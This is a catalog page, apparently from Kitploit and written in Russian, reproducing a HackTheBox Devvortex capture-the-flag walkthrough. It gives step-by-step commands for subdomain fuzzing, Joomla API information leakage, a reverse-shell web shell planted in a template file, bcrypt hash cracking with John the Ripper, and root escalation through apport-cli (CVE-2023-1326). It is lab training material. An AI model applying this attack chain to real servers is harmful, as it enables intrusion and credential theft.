Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
DEVVORTEX — Прохождение HackTheBox Devvortex, охватывающее фаззинг поддоменов, перечисление API Joomla, веб-шелл на основе шаблона, взлом bcrypt-хэша и повышение привилегий через Apport-CLI CVE-2023-1326. | Kitploit
Инструменты/GitHubGitHub/r3fr4kt/devvortex
Взлом паролейПовышение привилегийАнализ уязвимостейЭксплуатация веб-приложенийСбор информацииCTFТестирование на ПроникновениеПеречисление ПоддоменовОбучение и ОбразованиеЛаборатории и Практика
GitHubr3fr4kt/devvortex
7 ч 58 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

DEVVORTEX

Прохождение HackTheBox Devvortex, охватывающее фаззинг поддоменов, перечисление API Joomla, веб-шелл на основе шаблона, взлом bcrypt-хэша и повышение привилегий через Apport-CLI CVE-2023-1326.

Репозиторий

DEVVORTEX

HackTheBox: Devvortex — разбор машины

Подробное техническое руководство, описывающее компрометацию машины Devvortex на HackTheBox. Этот путь демонстрирует фаззинг поддоменов, перечисление Joomla API, модификацию шаблона для первоначального доступа, извлечение и взлом хешей базы данных для горизонтального перемещения и эксплуатацию Apport-CLI (CVE-2023-1326) для повышения привилегий до root.


Краткое резюме

  • Целевая ОС: Linux
  • Сложность: Easy
  • Домен: devvortex.htb
  • Поддомен: dev.devvortex.htb
  • Ключевые концепции: Перечисление поддоменов, эксплуатация Joomla CMS, раскрытие информации, взлом Bcrypt-хешей, злоупотребление Sudo (apport-cli).

1. Разведка и перечисление

Сканирование портов (Nmap)

Первоначально было выполнено быстрое обнаружение TCP-портов по всем портам:

root@kitploit:~
nmap -Pn -n -p- --open --min-rate 5000 <TARGET_IP>

Затем было выполнено сканирование для определения служб и версий на выявленных открытых портах:

Bash

root@kitploit:~
nmap -sCV --min-rate 5000 -p22,80 <TARGET_IP>

Настройка hosts-файла

Добавьте базовый целевой домен в локальную таблицу разрешения имён:

Bash

root@kitploit:~
sudo nano /etc/hosts
# Append: <TARGET_IP> devvortex.htb

Обнаружение поддоменов (FFUF)

Фаззинг виртуальных хостов для выявления дополнительных веб-ресурсов:

Bash

root@kitploit:~
ffuf -u [http://FUZZ.devvortex.htb](http://FUZZ.devvortex.htb) -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ

Результат: Обнаружен dev.devvortex.htb. Добавлен dev.devvortex.htb в /etc/hosts.

Фаззинг директорий

Перечисление маршрутов на недавно обнаруженном виртуальном хосте:

Bash

root@kitploit:~
ffuf -u [http://dev.devvortex.htb/FUZZ](http://dev.devvortex.htb/FUZZ) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt:FUZZ

Результат: Обнаружена конечная точка /administrator, предоставляющая доступ к порталу аутентификации администратора Joomla.

2. Первоначальный доступ (точка опоры)

Утечка информации через Joomla API

Исследование публичных конечных точек, предоставляемых REST API Joomla, для сбора конфиденциальных метрик приложения и пользователей:

Bash

root@kitploit:~
curl -s [http://dev.devvortex.htb/api/index.php/v1/users?public=true](http://dev.devvortex.htb/api/index.php/v1/users?public=true)
curl -s [http://dev.devvortex.htb/api/index.php/v1/application?public=true](http://dev.devvortex.htb/api/index.php/v1/application?public=true)

Внедрение веб-шелла через шаблоны сайта

Используя учётные данные, обнаруженные во время перечисления, войдите в портал /administrator Joomla:

  1. Перейдите в System > Site Templates.

  2. Выберите активный шаблон и откройте error.php.

  3. Замените содержимое error.php на стандартную полезную нагрузку PHP reverse shell.

Запустите локальный слушатель netcat:

Bash

root@kitploit:~
nc -lvnp 4444

Вызовите выполнение error.php, запросив несуществующую страницу или обратившись к файлу напрямую.

Стабилизация TTY-шелла

После подключения шелла от имени www-data запустите интерактивную PTY-сессию:

Bash

root@kitploit:~
python3 -c 'import pty; pty.spawn("/bin/bash")'

3. Горизонтальное перемещение (Logan)

Перечисление базы данных

Получите доступ к локальной базе данных MySQL, используя учётные данные, извлечённые из конфигурационных файлов веб-приложения:

Bash

root@kitploit:~
mysql -u lewis -p

Выполните запрос к таблице пользователей, чтобы найти сохранённые хеши учётных данных:

SQL

root@kitploit:~
SHOW DATABASES;
USE joomla;
SHOW TABLES;
SELECT username, password FROM sd4fg_users;

Офлайн-взлом пароля

Извлеките bcrypt-хеш пароля пользователя logan в локальный файл:

Bash

root@kitploit:~
nano hash.txt

Взломайте хеш с помощью John the Ripper вместе с rockyou.txt:

Bash

root@kitploit:~
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Аутентификация через SSH

Установите постоянную SSH-сессию от имени пользователя logan с использованием взломанных учётных данных:

Bash

root@kitploit:~
ssh [email protected]

Флаг пользователя

Bash

root@kitploit:~
cat user.txt

4. Повышение привилегий

Аудит привилегий Sudo

Проверьте разрешённые бинарные файлы для пользователя logan:

Bash

root@kitploit:~
sudo -l

Вывод: Пользователь может запускать /usr/bin/apport-cli от имени root.

Эксплуатация Apport-CLI (CVE-2023-1326)

Проверьте установленную версию apport-cli:

Bash

root@kitploit:~
apport-cli --version

Проверьте /var/crash на наличие существующих файлов отчётов. Если пусто, создайте файл сбоя вручную:

Bash

root@kitploit:~
echo "ProblemType: Crash" > /var/crash/.crash

Запустите apport-cli для созданного файла сбоя с помощью sudo:

Bash

root@kitploit:~
sudo /usr/bin/apport-cli -c /var/crash/.crash
  1. Нажмите v, чтобы View report.

  2. Когда пейджер (less) загрузит содержимое, выйдите в системный шелл, введя:

Plaintext

root@kitploit:~
!/bin/bash

5. Закрепление в системе

Проверьте повышение до root:

Bash

root@kitploit:~
whoami
# Output: root

Флаг root

Bash

root@kitploit:~
cat /root/root.txt
Скачать инструмент